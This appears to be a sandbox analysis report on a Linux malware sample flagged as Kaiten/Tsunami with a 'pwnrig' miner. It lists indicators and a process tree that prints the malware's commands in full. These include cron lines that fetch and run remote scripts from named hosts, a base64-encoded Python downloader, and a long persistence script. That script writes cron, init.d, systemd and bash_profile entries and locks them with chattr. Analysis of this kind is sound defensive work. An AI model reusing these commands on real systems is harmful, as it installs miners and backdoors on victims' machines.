Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
131s -
max time network
132s -
platform
ubuntu-20.04_amd64 -
resource
ubuntu2004-amd64-20240221-en -
resource tags
arch:amd64arch:i386image:ubuntu2004-amd64-20240221-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system -
submitted
24/02/2024, 19:04
Behavioral task
behavioral1
Sample
bin.elf
Resource
ubuntu2004-amd64-20240221-en
General
-
Target
bin.elf
-
Size
3.8MB
-
MD5
1184bf04877dec9a4bbb24acd30c8d49
-
SHA1
e68649a61a173c93775580ec0e975a3a87250e9d
-
SHA256
96a47e74c42f7cb2799ef064f413aeaeaf667662a3983b4e66556a827aa2481a
-
SHA512
25917099b31a0bd7b3fab4600c318c3a3acab5bb1c2dc8d7fbccfc22046fb7a551747065ad9016dba26d8de16a0782d4a7279a5b644c7802f4151c4d3184d104
-
SSDEEP
98304:e6M0JGEyxYXQKOscf3j3/DaNAq//XxsdQDYpexnaG4oDhAJ:i0JZ8yysw3zDuTXqQD+exawDhY
Malware Config
Signatures
-
Detects Kaiten/Tsunami Payload 1 IoCs
resource yara_rule behavioral1/memory/2013-2-0x00007fec9ea38000-0x00007fec9ea4c700-memory.dmp family_kaiten2 -
Detects Kaiten/Tsunami payload 1 IoCs
resource yara_rule behavioral1/memory/2013-2-0x00007fec9ea38000-0x00007fec9ea4c700-memory.dmp family_kaiten -
Executes dropped EXE 1 IoCs
ioc pid Process /etc/init.d/knlib 1499 knlib -
Reads EFI boot settings 10 IoCs
Reads EFI boot settings from the efivars filesystem, may contain security secrets or sensitive data.
description ioc Process File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl -
resource yara_rule behavioral1/files/fstream-8.dat upx -
Attempts to change immutable files 14 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
pid Process 2172 sed 2351 sh 2354 hostname 2167 chattr 2058 chattr 2070 sed 2075 chattr 2165 chattr 2063 chattr 2072 chattr 2108 sed 2060 sed 2065 chattr 2173 chattr -
Checks CPU configuration 1 TTPs 6 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo bin.64 File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo bin.64 File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep -
Checks hardware identifiers (DMI) 1 TTPs 8 IoCs
Checks DMI information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /sys/devices/virtual/dmi/id/bios_vendor bin.64 File opened for reading /sys/devices/virtual/dmi/id/sys_vendor bin.64 File opened for reading /sys/devices/virtual/dmi/id/product_name bin.64 File opened for reading /sys/devices/virtual/dmi/id/board_vendor bin.64 File opened for reading /sys/devices/virtual/dmi/id/bios_vendor bin.64 File opened for reading /sys/devices/virtual/dmi/id/sys_vendor bin.64 File opened for reading /sys/devices/virtual/dmi/id/product_name bin.64 File opened for reading /sys/devices/virtual/dmi/id/board_vendor bin.64 -
Creates/modifies Cron job 1 TTPs 15 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /etc/cron.hourly/pwnrig tee File opened for modification /etc/cron.monthly/pwnrig tee File opened for modification /etc/cron.weekly/pwnrig tee File opened for modification /etc/cron.weekly/sedVM9D8G sed File opened for modification /var/spool/cron/crontabs/tmp.9tob60 crontab File opened for modification /var/spool/cron/crontabs/tmp.T4nqKV crontab File opened for modification /etc/cron.d/pwnrig tee File opened for modification /etc/cron.daily/pwnrig tee File opened for modification /etc/cron.d/sedn6k6uK sed File opened for modification /var/spool/cron/crontabs/tmp.lAHWI7 crontab File opened for modification /etc/cron.daily/sedTFT2VK sed File opened for modification /etc/cron.hourly/sedQpqhUK sed File opened for modification /etc/cron.monthly/sedHnDuhH sed File opened for modification /var/spool/cron/crontabs/tmp.Pf2Sis crontab File opened for modification /var/spool/cron/crontabs/tmp.FYiU5t crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
description ioc Process File opened for modification /etc/init.d/pwnrig tee File opened for modification /etc/init.d/sedAMNbQA sed File opened for modification /etc/init.d/knlib bin.elf -
Modifies systemd 1 TTPs 3 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
description ioc Process File opened for modification /etc/systemd/system/knlibe.service bin.elf File opened for modification /lib/systemd/system/pwnrigl.service tee File opened for modification /etc/systemd/system/pwnrige.service tee -
Reads CPU attributes 1 TTPs 12 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/types bin.64 File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online bin.64 File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online bin.64 File opened for reading /sys/devices/system/cpu/possible bin.64 File opened for reading /sys/devices/system/cpu/types bin.64 File opened for reading /sys/devices/system/cpu/possible bin.64 File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps -
Reads hardware information 1 TTPs 28 IoCs
Accesses system info like serial numbers, manufacturer names etc.
description ioc Process File opened for reading /sys/devices/virtual/dmi/id/board_name bin.64 File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor bin.64 File opened for reading /sys/devices/virtual/dmi/id/chassis_type bin.64 File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag bin.64 File opened for reading /sys/devices/virtual/dmi/id/bios_date bin.64 File opened for reading /sys/devices/virtual/dmi/id/product_uuid bin.64 File opened for reading /sys/devices/virtual/dmi/id/chassis_version bin.64 File opened for reading /sys/devices/virtual/dmi/id/product_version bin.64 File opened for reading /sys/devices/virtual/dmi/id/board_serial bin.64 File opened for reading /sys/devices/virtual/dmi/id/board_name bin.64 File opened for reading /sys/devices/virtual/dmi/id/board_version bin.64 File opened for reading /sys/devices/virtual/dmi/id/bios_version bin.64 File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag bin.64 File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor bin.64 File opened for reading /sys/devices/virtual/dmi/id/product_uuid bin.64 File opened for reading /sys/devices/virtual/dmi/id/product_serial bin.64 File opened for reading /sys/devices/virtual/dmi/id/chassis_serial bin.64 File opened for reading /sys/devices/virtual/dmi/id/product_serial bin.64 File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag bin.64 File opened for reading /sys/devices/virtual/dmi/id/bios_date bin.64 File opened for reading /sys/devices/virtual/dmi/id/product_version bin.64 File opened for reading /sys/devices/virtual/dmi/id/board_version bin.64 File opened for reading /sys/devices/virtual/dmi/id/chassis_version bin.64 File opened for reading /sys/devices/virtual/dmi/id/chassis_type bin.64 File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag bin.64 File opened for reading /sys/devices/virtual/dmi/id/bios_version bin.64 File opened for reading /sys/devices/virtual/dmi/id/board_serial bin.64 File opened for reading /sys/devices/virtual/dmi/id/chassis_serial bin.64 -
Writes file to system bin folder 1 TTPs 5 IoCs
description ioc Process File opened for modification /bin/knlib bin.elf File opened for modification /bin/bprofr cp File opened for modification /bin/crondr cp File opened for modification /bin/initdr cp File opened for modification /bin/sysdr cp -
Enumerates kernel/hardware configuration 1 TTPs 64 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/bus/node/devices/node0/meminfo bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_id bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size bin.64 File opened for reading /sys/bus/node/devices/node0/meminfo bin.64 File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_bandwidth bin.64 File opened for reading /sys/fs/cgroup/cpuset/cpuset.cpus bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map bin.64 File opened for reading /sys/bus/node/devices/node0/access1/initiators bin.64 File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map bin.64 File opened for reading /sys/fs/cgroup/cpuset/cpuset.mems bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/base_frequency bin.64 File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_latency bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/topology/package_cpus bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/size bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/type bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map bin.64 File opened for reading /sys/kernel/mm/hugepages bin.64 File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_cpus bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/topology/die_cpus bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/type bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/type bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets bin.64 File opened for reading /sys/bus/dax/devices/target_node bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/type bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/level bin.64 File opened for reading /sys/fs/cgroup/unified/cgroup.controllers bin.64 File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_bandwidth bin.64 File opened for reading /sys/bus/node/devices/node0/hugepages bin.64 File opened for reading /sys/fs/cgroup/cpuset/cpuset.mems bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/topology/package_cpus bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/level bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/type bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/type bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/level bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map bin.64 File opened for reading /sys/bus/node/devices/node0/cpumap bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/level bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/type bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/size bin.64 File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_latency bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_id bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/topology/physical_package_id bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/size bin.64 File opened for reading /sys/bus/dax/devices bin.64 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/level bin.64 File opened for reading /sys/bus/dax/devices/target_node bin.64 -
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
description ioc Process File opened for reading /proc/72/stat ps File opened for reading /proc/75/cmdline ps File opened for reading /proc/200/stat ps File opened for reading /proc/2016/status ps File opened for reading /proc/490/cmdline ps File opened for reading /proc/1055/stat ps File opened for reading /proc/2262/stat ps File opened for reading /proc/2260/status ps File opened for reading /proc/695/stat ps File opened for reading /proc/18/status ps File opened for reading /proc/1471/cmdline ps File opened for reading /proc/102/status ps File opened for reading /proc/17/cmdline ps File opened for reading /proc/86/status ps File opened for reading /proc/93/cmdline ps File opened for reading /proc/1042/status ps File opened for reading /proc/780/status ps File opened for reading /proc/1122/status ps File opened for reading /proc/522/status ps File opened for reading /proc/2327/cmdline ps File opened for reading /proc/2257/cmdline ps File opened for reading /proc/168/status ps File opened for reading /proc/filesystems mkdir File opened for reading /proc/618/stat ps File opened for reading /proc/619/cmdline ps File opened for reading /proc/810/cmdline ps File opened for reading /proc/75/status ps File opened for reading /proc/502/stat ps File opened for reading /proc/439/status ps File opened for reading /proc/74/stat ps File opened for reading /proc/1/environ systemctl File opened for reading /proc/618/status ps File opened for reading /proc/829/cmdline ps File opened for reading /proc/785/cmdline ps File opened for reading /proc/780/stat ps File opened for reading /proc/785/cmdline ps File opened for reading /proc/174/stat ps File opened for reading /proc/490/cmdline ps File opened for reading /proc/175/stat ps File opened for reading /proc/92/cmdline ps File opened for reading /proc/172/cmdline ps File opened for reading /proc/85/cmdline ps File opened for reading /proc/440/cmdline ps File opened for reading /proc/2261/status ps File opened for reading /proc/490/stat ps File opened for reading /proc/2403/cmdline ps File opened for reading /proc/676/status ps File opened for reading /proc/159/stat ps File opened for reading /proc/568/status ps File opened for reading /proc/14/cmdline ps File opened for reading /proc/950/stat ps File opened for reading /proc/16/cmdline ps File opened for reading /proc/763/status ps File opened for reading /proc/676/stat ps File opened for reading /proc/22/status ps File opened for reading /proc/74/status ps File opened for reading /proc/201/cmdline ps File opened for reading /proc/sys/kernel/osrelease ps File opened for reading /proc/522/cmdline ps File opened for reading /proc/539/status ps File opened for reading /proc/1611/cmdline ps File opened for reading /proc/1305/stat ps File opened for reading /proc/173/status ps File opened for reading /proc/1615/status ps -
Writes file to tmp directory 8 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/~/.bash_profile sh File opened for modification /tmp/.lock bin.64 File opened for modification /tmp/bi.64 bin.elf File opened for modification /tmp/bin.64 bin.elf File opened for modification /tmp/.klibsystem4.lock bin.elf File opened for modification /tmp/bin.64 Process not Found File opened for modification /tmp/bi.64 Process not Found File opened for modification /tmp/.bashirc bi.64 -
GoLang User-Agent 15 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 33 Go-http-client/1.1 HTTP User-Agent header 66 Go-http-client/1.1 HTTP User-Agent header 23 Go-http-client/1.1 HTTP User-Agent header 50 Go-http-client/1.1 HTTP User-Agent header 54 Go-http-client/1.1 HTTP User-Agent header 62 Go-http-client/1.1 HTTP User-Agent header 70 Go-http-client/1.1 HTTP User-Agent header 40 Go-http-client/1.1 HTTP User-Agent header 52 Go-http-client/1.1 HTTP User-Agent header 60 Go-http-client/1.1 HTTP User-Agent header 64 Go-http-client/1.1 HTTP User-Agent header 68 Go-http-client/1.1 HTTP User-Agent header 56 Go-http-client/1.1 HTTP User-Agent header 58 Go-http-client/1.1 HTTP User-Agent header 73 Go-http-client/1.1
Processes
-
/tmp/bin.elf/tmp/bin.elf1⤵
- Modifies init.d
- Modifies systemd
- Writes file to system bin folder
- Writes file to tmp directory
PID:1475 -
/usr/bin/bashbash -c "rm -rf /etc/sysctl.conf ; echo fs.file-max = 2097152 > /etc/sysctl.conf ; sysctl -p ; ulimit -Hn ; ulimit -n 99999 -u 999999"2⤵PID:1495
-
/usr/bin/rmrm -rf /etc/sysctl.conf3⤵PID:1496
-
-
/usr/sbin/sysctlsysctl -p3⤵PID:1497
-
-
-
/usr/bin/chattrchattr +ia /etc/init.d/knlib2⤵PID:1498
-
-
/etc/init.d/knlib/etc/init.d/knlib start2⤵
- Executes dropped EXE
PID:1499 -
/usr/bin/cpcp -f -r -- /bin/knlib /bin/klibsystem43⤵PID:1500
-
-
/usr/bin/rmrm -rf -- klibsystem43⤵PID:1502
-
-
/usr/bin/nohupnohup ./klibsystem43⤵PID:1501
-
-
-
/usr/bin/chattrchattr +ia /etc/systemd/system/knlibe.service2⤵PID:1503
-
-
/usr/bin/systemctlsystemctl daemon-reload2⤵
- Reads EFI boot settings
PID:1505
-
-
/usr/bin/systemctlsystemctl enable knlibe.service2⤵
- Reads EFI boot settings
- Enumerates kernel/hardware configuration
PID:1558
-
-
/usr/bin/chattrchattr +ia /bin/knlib2⤵PID:1594
-
-
/usr/bin/bashbash -c "echo '*/10 * * * * (curl -s http://dw.c4kdeliver.top:443/2.gif || wget -q -O - http://dw.c4kdeliver.top:443/2.gif || lwp-download http://dw.c4kdeliver.top:443/2.gif /tmp/2.gif) | bash -sh; bash /tmp/2.gif; rm -rf /tmp/2.gif; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDY6NDQzL2QucHkiKS5yZWFkKCkpJyB8fCBweXRob24yIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash' | crontab -"2⤵PID:2554
-
/usr/bin/crontabcrontab -3⤵
- Creates/modifies Cron job
PID:2556
-
-
-
/usr/bin/ssss -ant2⤵PID:2557
-
-
/usr/bin/ssss -ant2⤵PID:2558
-
-
/usr/bin/ssss -ant2⤵PID:2559
-
-
/usr/bin/bashbash -c "echo '*/10 * * * * (curl -s http://dw.c4kdeliver.top:443/2.gif || wget -q -O - http://dw.c4kdeliver.top:443/2.gif || lwp-download http://dw.c4kdeliver.top:443/2.gif /tmp/2.gif) | bash -sh; bash /tmp/2.gif; rm -rf /tmp/2.gif; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDY6NDQzL2QucHkiKS5yZWFkKCkpJyB8fCBweXRob24yIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash' | crontab -"2⤵PID:2567
-
/usr/bin/crontabcrontab -3⤵
- Creates/modifies Cron job
PID:2569
-
-
-
/usr/bin/ssss -ant2⤵PID:2570
-
-
/usr/bin/ssss -ant2⤵PID:2571
-
-
/usr/bin/ssss -ant2⤵PID:2572
-
-
/usr/bin/klibsystem4./klibsystem41⤵PID:1501
-
/usr/bin/bashbash -c "echo '*/10 * * * * (curl -s http://185.172.128.146:443/2.gif || wget -q -O - http://dw.c4kdeliver.top:443/2.gif || lwp-download http://dw.c4kdeliver.top:443/2.gif /tmp/2.gif) | bash -sh; bash /tmp/2.gif; rm -rf /tmp/2.gif; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDY6NDQzL2QucHkiKS5yZWFkKCkpJyB8fCBweXRob24yIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash' | crontab -"1⤵PID:2007
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:2009
-
-
/usr/bin/ssss -ant1⤵PID:2010
-
/usr/bin/nohupnohup /tmp/bi.64 "&"1⤵PID:2013
-
/tmp/bi.64/tmp/bi.64 "&"1⤵
- Writes file to tmp directory
PID:2013
-
/usr/bin/ssss -ant1⤵PID:2015
-
/usr/bin/nohupnohup /tmp/bin.64 -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d -pwn "&"1⤵PID:2016
-
/tmp/bin.64/tmp/bin.64 -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d -pwn "&"1⤵
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
PID:2016 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""2⤵PID:2017
-
/usr/bin/whoamiwhoami3⤵PID:2028
-
-
/usr/bin/hostnamehostname3⤵PID:2029
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo3⤵
- Checks CPU configuration
PID:2030
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵PID:2046
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"3⤵PID:2048
-
-
/usr/bin/psps -A "-ostat,ppid"3⤵
- Reads CPU attributes
- Reads runtime system information
PID:2047
-
-
/usr/bin/idid -u3⤵PID:2050
-
-
/usr/bin/grepgrep -v grep3⤵PID:2053
-
-
/usr/bin/grepgrep /etc/cron3⤵PID:2052
-
-
/usr/bin/psps x3⤵
- Reads CPU attributes
- Reads runtime system information
PID:2051
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/bin.64';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG 